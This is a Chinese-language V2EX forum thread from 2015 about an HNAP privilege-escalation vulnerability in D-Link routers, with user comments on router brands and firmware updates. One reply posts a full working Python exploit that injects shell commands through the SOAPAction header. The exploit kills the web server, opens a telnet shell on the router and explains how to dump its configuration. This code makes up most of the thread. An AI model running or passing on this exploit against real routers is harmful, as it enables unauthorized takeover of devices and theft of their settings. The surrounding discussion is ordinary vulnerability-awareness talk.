各大无线路由器品牌暴漏洞

2015-06-03 00:38:19 +08:00
 davidyin
HNAP Privilege Escalation Vulnerability
看看自己的路由器有没有出更新的固件。

先去更新我的 D-Link Dir-850L
3620 次点击
所在节点    分享发现
7 条回复
lhbc
2015-06-03 02:56:32 +08:00
国产的全都有后门,还用查……
princeofwales
2015-06-03 08:24:44 +08:00
网件的会不会有问题,美帝的
就是怕了国产的,再便宜都不想买
lee015
2015-06-03 08:34:01 +08:00
刷了开源固件还会有问题吗?
ledzep2
2015-06-03 10:28:44 +08:00
现在电信联通连个公网ip都不给, 想访问都找不着. 洗洗睡...
Karblue
2015-06-03 14:27:12 +08:00
不是只影响Dlink么。国内厂商好像没有躺枪吧
Karblue
2015-06-03 14:32:04 +08:00
#!/usr/bin/env python

import sys
import urllib2
import httplib

try:
ip_port = sys.argv[1].split(':')
ip = ip_port[0]

if len(ip_port) == 2:
port = ip_port[1]
elif len(ip_port) == 1:
port = "80"
else:
raise IndexError
except IndexError:
print "Usage: %s <target ip:port>" % sys.argv[0]
sys.exit(1)

url = "http://%s:%s/HNAP1" % (ip, port)
# NOTE: If exploiting from the LAN, telnetd can be started on
# any port; killing the http server and re-using its port
# is not necessary.
#
# Killing off all hung hnap processes ensures that we can
# re-start httpd later.
command = "killall httpd; killall hnap; telnetd -p %s" % port
headers = {
"SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
}

req = urllib2.Request(url, None, headers)
try:
urllib2.urlopen(req)
raise Exception("Unexpected response")
except httplib.BadStatusLine:
print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
sys.exit(0)
except Exception:
print "Received an unexpected response from the server; exploit probably failed. :("



POC在此。从devttsy0大神po来的
Karblue
2015-06-03 14:39:32 +08:00
还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/195661

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX